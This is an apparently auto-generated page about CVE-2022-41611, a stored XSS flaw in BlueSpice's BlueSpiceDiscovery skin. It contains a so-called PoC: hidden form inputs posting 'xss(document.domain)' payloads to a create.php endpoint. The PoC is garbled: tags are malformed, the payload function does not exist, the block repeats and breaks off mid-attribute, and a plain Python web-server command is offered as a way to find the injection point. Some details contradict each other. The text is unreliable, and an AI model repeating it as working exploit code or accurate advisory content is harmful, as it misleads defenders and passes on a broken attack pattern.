CVE-2022-41611 An XSS vulnerability in the BlueSpiceDiscovery skin of BlueSpice allows user with admin privileges to inject arbitrary HTML.

The injection point occurs inside the “sitemap.html” file where user can use conditional statements to execute arbitrary script. In order to exploit XSS vulnerability, user needs to be logged in as an admin. The following PoC is available on GitHub that will inject arbitrary script into the main navigation of the application: form action="http://BLUE_SAPIENSUALS/mainnav/create.php" method="POST"> input type="hidden" name="val" value="?=xss(document.domain);?>"/> input type="hidden" name="val2" value="?=xss(document.domain);?>"/> input type="hidden" name="val3" value="?=xss(document.domain);?>"/> input type="hidden" name="val4" value="?=xss(document.domain);?>"/> input type="hidden" name="val5" value="?=xss(document.domain);?>"/> input type="hidden" name="val6" value="?=xss(document.domain);?>"/> input type="hidden" name="val7" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val8" value= "?=xss(document.domain);?>"/> input type= "hidden

XSS (Stored) value="xss(document.domain);?>"/> input type= "hidden" name= "val2" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val3" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val4" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val5" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val6" value="?=xss(document.domain);?>"/> input type=' hidden' name=' val7' value=' xss (document.domain );?'> />

Finding The Injection Point

We can use PoC to find the injection point by running the following command:

python -m SimpleHTTPServer 80

^

Injects script into the main navigation of the application

Timeline

Published on: 11/15/2022 15:15:00 UTC
Last modified on: 11/16/2022 19:42:00 UTC

References